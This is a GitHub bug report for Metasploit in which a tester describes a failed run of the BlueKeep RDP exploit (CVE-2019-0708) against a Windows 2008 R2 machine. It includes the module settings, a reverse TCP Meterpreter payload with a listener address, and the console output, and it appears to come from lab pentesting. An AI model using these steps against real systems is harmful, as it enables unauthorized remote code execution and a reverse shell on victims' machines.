rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.8k stars 13.9k forks source link

Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer #12425

Closed meetgyn closed 3 years ago

meetgyn commented 4 years ago

Steps to reproduce

How'd you do it?

  1. ... set rhosts 192.168.1.59 2..... set target 1 (Windows 2008 r2 fisical machine) 3.....set payload windows/x64/meterpreter/reverse_tcp 4......set lhost 192.168.173.211 (IP kali in NAT) 5.,..... Exploit

Metasploit version

msfconsole --version Framework Version: 5.0.50-dev-8f049f5c23

I installed Metasploit with:

OS

Linux pentest 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64 GNU/Linux DEMON LINUX

What OS are you running Metasploit on?

I am testing on windows 2008R2 on a physical machine

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[] Started reverse TCP handler on 192.168.173.211:4444 [+] 192.168.1.59:3389 - The target is vulnerable. [] 192.168.1.59:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [] 192.168.1.59:3389 - Surfing channels ... [] 192.168.1.59:3389 - Lobbing eggs ... [-] 192.168.1.59:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.

LionRoar commented 4 years ago

I think this because the sound channel is disabled by default in Windows Server 2008 R2 I'm still looking for work around If someone have a solution please share the benefit.

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.